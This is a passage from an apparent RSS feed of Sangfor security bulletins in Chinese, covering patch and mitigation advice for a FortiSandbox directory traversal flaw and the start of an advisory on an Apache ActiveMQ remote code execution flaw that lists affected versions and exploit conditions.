rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041737" src="https://wechat2rss.xlab.app/img-proxy/?k=fa3739ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTWyicPsJ9jy4XR4VtMbFjNibtWR1V0YkGRSvEXFvOjDBLEwHMGsnN3JAjClxJZe17XtAw1vTSoOWygPytPLCbVqoHCyJEqd9IfE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将FortiSandbox5.0升级到5.0.6或更高版本，FortiSandbox升级到4.4.9或更高版本。</span><span leaf=""><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-112" target="_blank">https://fortiguard.fortinet.com/psirt/FG-IR-26-112</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041736" src="https://wechat2rss.xlab.app/img-proxy/?k=1f1faae7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSVGibMRZSLkaqKYcWqvMe6Pff0nxFj14MZryDN8OzVT8SMQKrnXhCnGzOUwb6wwhf2XnziaRFb4Qb50oZXyEBchMnNfUYtVARK4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041740" src="https://wechat2rss.xlab.app/img-proxy/?k=61f1f820&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSjnN1nwF7HqVcl76Rb22XicdicBdW15pYQ8fLheYnpRvnwOXwEdurzkKfYWQicDtAP0YAzPAKSE9ZzsvbkwURVjGM6PNQvibbgmpc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiSandbox目录遍历漏洞(CVE-2026-39813)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，</span></span></strong><span leaf="">快速检查受影响范围，相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年05月06日发布监测方案，规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月06日发布监测方案（需要具备SIP组件能力），规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月06日发布监测方案，规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiSandbox目录遍历漏洞(CVE-2026-39813)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年05月06日发布防护方案，规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年05月06日发布防护方案，规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月06日发布防护方案（需要具备AF组件能力），规则ID:11220421。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年05月06日发布防护方案（需要具备AF组件能力），规则ID:11220421。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-112" target="_blank">https://fortiguard.fortinet.com/psirt/FG-IR-26-112</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/23</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到FortiSandbox目录遍历漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/24</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041750" data-ratio="0.5314814814814814" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a8dce610&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxRE5TuuSobvgGDWjNSa0zEwR0IAtCN2JDKROXZGbyoF093vjboORbeD8utMO0ibyTGEyPKhvcD807oZs2GvPVfN1LjFb97eZXzo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16312%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3259b693&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525409%26idx%3D2%26sn%3D59c0589b623e6dab519fe3c291a01d44">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 20:29:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525409&amp;idx=3&amp;sn=7d8ac68421247c6192fa11298fc0c3eb</link>
      <description>2026年4月24日，深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息，漏洞编号：CVE-2026-40466，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-24 20:29</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=3ca679bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxSDE4HtiaHWCfHGQOAINog9yu3N1iajOvuwnlUZZaicEqxSBsO2685qTb2jYyuRbiaR0WwwZL6e2Czl34TS1lQ85SU30VgPQdSRlEk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月24日，深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息，漏洞编号：CVE-2026-40466，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041759" src="https://wechat2rss.xlab.app/img-proxy/?k=d5238ebb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQ2QrvYftegyQickBtSBL5cPPDR8HuWOnzIUsGd9IpJicblDuedyqtd0hicz8ol6jxWtc8RGia8F2yhj39LotGrNZsKpbHe1xvcAFc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ 远程代码执行漏洞(CVE-2026-40466)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ&lt; 6.2.5</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ Broker &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ Broker &lt; 6.2.5</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ All &lt; 5.19.6</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.0.0 ≤ Apache ActiveMQ All &lt; 6.2.5</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">代码执行</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：需要用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：困难，需要认证。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，能造成远程代码执行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041758" src="https://wechat2rss.xlab.app/img-proxy/?k=98f13a9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSQe1zrUVlqbfvgIs15bKkNwMmfwmklroiaqxgdBNtcicNmoxelqD5DEKI0tiaOYYo51SXAoicYjp0AEADSnRRc6HBKKzNoYFChwSo%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ 是最流行的开源、多协议、基于 Java 的消息代理。它支持行业标准协议，因此用户可以从多种语言和平台的客户端选择中受益。从使用 JavaScript、C、C++、Python、.Net 等编写的客户端进行连接。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041755" src="https://wechat2rss.xlab.app/img-proxy/?k=6207fec4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTx4waGibEAW4qpbOJlJZaD3Jea9kX4YicyKP3EIYoicgHjiaibMicibL99YynlvWiafZ6q5WS9Qm69pfYz6E6icyVFJsdGRbY0iaUuWeaDY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月24日，深瞳漏洞实验室监测到一则Apache ActiveMQ组件存在代码执行漏洞的信息，漏洞编号：CVE-2026-40466，漏洞威胁等级：高危。</span></p><p style="text-align: left;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Apache ActiveMQ Broker、Apache Active MQ All和Apache ActiveMQ中的输入验证不正确、代码生成控制不正确代码注入漏洞。</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">如果ActiveMQ 